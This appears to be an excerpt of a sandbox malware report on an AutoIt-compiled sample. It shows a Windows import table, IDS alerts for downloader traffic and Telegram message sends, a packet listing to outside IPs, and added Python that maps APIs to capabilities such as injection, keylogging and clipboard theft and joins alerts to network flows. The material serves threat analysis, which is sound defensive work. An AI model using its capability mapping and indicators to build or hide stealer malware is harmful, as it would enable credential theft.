IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
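The import table above belongs to the AutoIt3 runtime stub, since the report classifies the sample as a compiled AutoIt script: the stub imports BlockInput, keybd_event, WriteProcessMemory, GetClipboardData and the rest whether or not the embedded script ever calls them. Import-based triage therefore tells you what the interpreter can do, not what this particular script does; the dynamic signatures in the report (clipboard read, keyboard/mouse blocking, browser and mail credential access) are what confirm use. As an added example (my code, not Joe Sandbox's), the Python below groups the report's imports by capability, applies a few escalation rules, and splits a flattened import row as it appears on this page. IMPORTS is a hand-copied subset of the table above; the capability grouping and the escalation rules are my own choices.

```python
"""Capability triage of a PE import table (added example, not Joe Sandbox code)."""
from collections import defaultdict

# Hand-copied subset of the import table in the report above.
IMPORTS = {
    "KERNEL32.dll": ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
                     "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
                     "IsDebuggerPresent", "CreateProcessW", "GetTempPathW", "Sleep"],
    "USER32.dll": ["GetAsyncKeyState", "GetKeyState", "GetKeyboardState", "SetKeyboardState",
                   "keybd_event", "mouse_event", "SendInput", "BlockInput", "OpenClipboard",
                   "GetClipboardData", "SetClipboardData", "RegisterHotKey", "FindWindowW"],
    "ADVAPI32.dll": ["RegSetValueExW", "RegCreateKeyExW", "AdjustTokenPrivileges",
                     "OpenProcessToken", "LogonUserW", "CreateProcessAsUserW",
                     "CreateProcessWithLogonW"],
    "WININET.dll": ["InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW",
                    "InternetReadFile", "FtpOpenFileW"],
    "WSOCK32.dll": ["socket", "connect", "send", "recv", "gethostbyname"],
    "SHELL32.dll": ["ShellExecuteExW", "SHGetFolderPathW"],
    "IPHLPAPI.DLL": ["IcmpSendEcho"],
}

# My own grouping of Win32 APIs by the capability they enable (an assumption, not a standard).
CAPABILITIES = {
    "process-injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "keylogging": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState", "RegisterHotKey"},
    "input-simulation": {"keybd_event", "mouse_event", "SendInput", "SetKeyboardState"},
    "input-blocking": {"BlockInput"},
    "clipboard": {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
    "anti-debug": {"IsDebuggerPresent"},
    "registry-write": {"RegSetValueExW", "RegCreateKeyExW"},
    "token-manipulation": {"AdjustTokenPrivileges", "OpenProcessToken", "LogonUserW",
                           "CreateProcessAsUserW", "CreateProcessWithLogonW"},
    "http-client": {"InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW", "InternetReadFile"},
    "ftp-client": {"FtpOpenFileW"},
    "raw-sockets": {"socket", "connect", "send", "recv", "gethostbyname"},
    "icmp": {"IcmpSendEcho"},
}


def classify_imports(imports):
    """Return {capability: sorted 'DLL!API' hits} for every capability with at least one hit."""
    hits = defaultdict(list)
    for dll, apis in imports.items():
        for api in apis:
            for cap, names in CAPABILITIES.items():
                if api in names:
                    hits[cap].append(f"{dll}!{api}")
    return {cap: sorted(v) for cap, v in sorted(hits.items())}


def flag_capability_combos(caps):
    """Name the capability combinations worth escalating; these rules are my own triage heuristics."""
    found = set(caps)
    rules = {
        "injection-capable loader": {"process-injection", "process-enumeration"},
        "credential/keystroke stealer": {"keylogging", "clipboard"},
        "stealer with egress": {"keylogging", "http-client"},
    }
    return sorted(name for name, need in rules.items() if need <= found)


def parse_flat_import_row(row):
    """Split a flattened row such as 'PSAPI.DLLGetProcessMemoryInfo' into (dll, [apis]).

    The DLL name ends at the first '.dll'/'.DLL' suffix; the remainder is a comma-separated API list.
    """
    idx = row.lower().find(".dll")
    if idx < 0:
        raise ValueError(f"no DLL suffix in row: {row!r}")
    end = idx + len(".dll")
    dll, rest = row[:end], row[end:]
    apis = [a.strip() for a in rest.split(",") if a.strip()]
    return dll, apis


if __name__ == "__main__":
    caps = classify_imports(IMPORTS)
    for cap, apis in caps.items():
        print(f"{cap:22s} {', '.join(apis)}")
    print("escalate:", flag_capability_combos(caps))
    print(parse_flat_import_row("IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho"))
```

Run it against a clean AutoIt3.exe as well: every capability it reports for this sample will also fire on the unmodified interpreter, which is the practical reason to treat the report's dynamic signatures, not the import table, as the evidence for what this script does.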
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T23:19:17.027297+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49716 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:17.996068+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49716 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:18.688114+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49728 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:19.449161+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49734 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:20.066545+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49740 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:26.879099+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49794 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:28.190658+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49807 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:29.119581+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49811 | 149.154.167.220 | 443 | TCP
2025-01-10T23:19:32.058579+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49826 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:32.996111+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49826 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:33.598886+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49841 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:34.355465+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49845 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:34.910911+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49851 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:40.191886+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49893 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:43.713922+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 61868 | 149.154.167.220 | 443 | TCP
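The alert table and the packet listing that follows it describe the same traffic from two angles: the alerts fire on payload patterns, the packet rows show every TCP segment. Joining the two on the client's ephemeral source port (unique within one analysis run) turns 100-plus packet rows into a handful of flows, each with its packet count, duration and the alerts that fired on it, and it makes visible the pattern of an HTTP fetch from 132.226.247.73:80 followed by a TLS session to 104.21.32.1:443, repeated several times, with the Telegram API host 149.154.167.220 appearing only in the alerts. As an added example (my code, not Joe Sandbox output), the Python below does that join. ALERTS and PACKETS are hand-copied rows from this report, with the packet sample limited to the first few connections; any alert whose flow is not in the sample is reported as unmatched rather than dropped.

```python
"""Reconstruct client flows from a packet listing and attach IDS alerts to them.

Added example, not Joe Sandbox code. ALERTS and PACKETS are hand-copied rows from the
report above (packet sample deliberately partial).
"""
from collections import defaultdict
from datetime import datetime

# (timestamp, SID, signature, severity, src ip, src port, dst ip, dst port)
ALERTS = [
    ("2025-01-10T23:19:17.027297+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
     "192.168.2.6", 49716, "132.226.247.73", 80),
    ("2025-01-10T23:19:17.996068+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
     "192.168.2.6", 49716, "132.226.247.73", 80),
    ("2025-01-10T23:19:18.688114+0100", 2803305, "ETPRO MALWARE Common Downloader Header Pattern H", 3,
     "192.168.2.6", 49728, "104.21.32.1", 443),
    ("2025-01-10T23:19:29.119581+0100", 1810007, "Joe Security ANOMALY Telegram Send Message", 1,
     "192.168.2.6", 49811, "149.154.167.220", 443),
]

# (timestamp, src port, dst port, src ip, dst ip), in the report's column order
PACKETS = [
    ("Jan 10, 2025 23:19:16.078361034 CET", 49716, 80, "192.168.2.6", "132.226.247.73"),
    ("Jan 10, 2025 23:19:16.084445000 CET", 80, 49716, "132.226.247.73", "192.168.2.6"),
    ("Jan 10, 2025 23:19:17.027297020 CET", 49716, 80, "192.168.2.6", "132.226.247.73"),
    ("Jan 10, 2025 23:19:17.040163994 CET", 49722, 443, "192.168.2.6", "104.21.32.1"),
    ("Jan 10, 2025 23:19:17.040203094 CET", 443, 49722, "104.21.32.1", "192.168.2.6"),
    ("Jan 10, 2025 23:19:17.952092886 CET", 49728, 443, "192.168.2.6", "104.21.32.1"),
    ("Jan 10, 2025 23:19:18.688169003 CET", 443, 49728, "104.21.32.1", "192.168.2.6"),
    ("Jan 10, 2025 23:19:18.692174911 CET", 49716, 80, "192.168.2.6", "132.226.247.73"),
]

LOCAL = "192.168.2.6"  # the analysis host, taken from the report


def parse_packet_time(s):
    """Parse 'Jan 10, 2025 23:19:16.078361034 CET'. The report prints nanoseconds;
    datetime carries microseconds, so the fraction is truncated to six digits."""
    body = s.rsplit(" ", 1)[0]          # drop the 'CET' zone label
    head, frac = body.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def build_flows(packets, local=LOCAL):
    """Group packets into client flows keyed by (local port, remote ip, remote port).
    Returns {key: {"packets", "out", "in", "first", "last"}}."""
    flows = {}
    for ts, sport, dport, src, dst in packets:
        if src == local:
            key, direction = (sport, dst, dport), "out"
        elif dst == local:
            key, direction = (dport, src, sport), "in"
        else:
            continue                    # not a flow of the analysis host
        t = parse_packet_time(ts)
        f = flows.setdefault(key, {"packets": 0, "out": 0, "in": 0, "first": t, "last": t})
        f["packets"] += 1
        f[direction] += 1
        f["first"] = min(f["first"], t)
        f["last"] = max(f["last"], t)
    return flows


def attach_alerts(flows, alerts):
    """Map each alert onto its flow by (src port, dst ip, dst port). Alerts whose flow has no
    packet in the listing are collected as unmatched so they are never silently lost."""
    by_flow = defaultdict(list)
    unmatched = []
    for _ts, sid, sig, sev, _src, sport, dst, dport in alerts:
        key = (sport, dst, dport)
        if key in flows:
            by_flow[key].append((sid, sig, sev))
        else:
            unmatched.append((sid, sig, sev))
    return dict(by_flow), unmatched


def summarize(packets=PACKETS, alerts=ALERTS):
    """One row per flow: (key, packet count, duration in seconds, [alert SIDs]), plus unmatched alerts."""
    flows = build_flows(packets)
    by_flow, unmatched = attach_alerts(flows, alerts)
    rows = []
    for key in sorted(flows):
        f = flows[key]
        duration = round((f["last"] - f["first"]).total_seconds(), 3)
        rows.append((key, f["packets"], duration, [sid for sid, _, _ in by_flow.get(key, [])]))
    return rows, unmatched


if __name__ == "__main__":
    rows, unmatched = summarize()
    for (lport, rip, rport), n, dur, sids in rows:
        print(f"{LOCAL}:{lport} -> {rip}:{rport}  packets={n} duration={dur}s alerts={sids}")
    print("alerts without packets in sample:", unmatched)
```

With the full packet listing pasted into PACKETS, the Telegram alert resolves to its own flow and the summary gives the cadence of the fetch-then-TLS pairs directly, which is what you want for a beaconing or exfiltration write-up.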
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 23:19:16.078361034 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:16.084445000 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:16.084522963 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:16.084886074 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:16.089617014 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:16.757812023 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:16.762742996 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:16.767633915 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:16.972708941 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:17.027297020 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:17.040163994 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.040203094 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.042181969 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.049207926 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.049225092 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.553848982 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.554229975 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.556942940 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.556950092 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.557411909 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.605415106 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.606704950 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.647330046 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.730053902 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.730217934 CET | 443 | 49722 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.730268002 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.737862110 CET | 49722 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.741214991 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:17.746170998 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:17.949717045 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:17.952092886 CET | 49728 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.952145100 CET | 443 | 49728 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.952235937 CET | 49728 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.952490091 CET | 49728 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:17.952505112 CET | 443 | 49728 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:17.996068001 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:18.540534973 CET | 443 | 49728 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:18.543248892 CET | 49728 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:18.543286085 CET | 443 | 49728 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:18.688169003 CET | 443 | 49728 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:18.688330889 CET | 443 | 49728 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:18.688385963 CET | 49728 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:18.688719034 CET | 49728 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:18.692174911 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:18.693103075 CET | 49734 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:18.697221994 CET | 80 | 49716 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:18.697308064 CET | 49716 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:18.697887897 CET | 80 | 49734 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:18.698031902 CET | 49734 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:18.698031902 CET | 49734 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:18.703008890 CET | 80 | 49734 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:19.403620005 CET | 80 | 49734 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:19.411602974 CET | 49740 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:19.411669970 CET | 443 | 49740 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:19.411744118 CET | 49740 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:19.412010908 CET | 49740 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:19.412029028 CET | 443 | 49740 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:19.449161053 CET | 49734 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:19.914982080 CET | 443 | 49740 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:19.916640997 CET | 49740 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:19.916677952 CET | 443 | 49740 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:20.066543102 CET | 443 | 49740 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:20.066632032 CET | 443 | 49740 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:20.066929102 CET | 49740 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:20.067168951 CET | 49740 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:20.071379900 CET | 49746 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:20.076371908 CET | 80 | 49746 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:20.076472044 CET | 49746 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:20.076575041 CET | 49746 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:20.081425905 CET | 80 | 49746 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:20.768685102 CET | 80 | 49746 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:20.770207882 CET | 49752 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:20.770243883 CET | 443 | 49752 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:20.770415068 CET | 49752 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:20.770816088 CET | 49752 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:20.770828962 CET | 443 | 49752 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:20.808566093 CET | 49746 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:21.248460054 CET | 443 | 49752 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:21.251149893 CET | 49752 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:21.251163960 CET | 443 | 49752 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:21.398843050 CET | 443 | 49752 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:21.398997068 CET | 443 | 49752 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:21.399302006 CET | 49752 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:21.399458885 CET | 49752 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:21.402707100 CET | 49746 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:21.403778076 CET | 49756 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:21.407747030 CET | 80 | 49746 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:21.408395052 CET | 49746 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:21.408621073 CET | 80 | 49756 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:21.408735037 CET | 49756 | 80 | 192.168.2.6 | 132.226.247.73
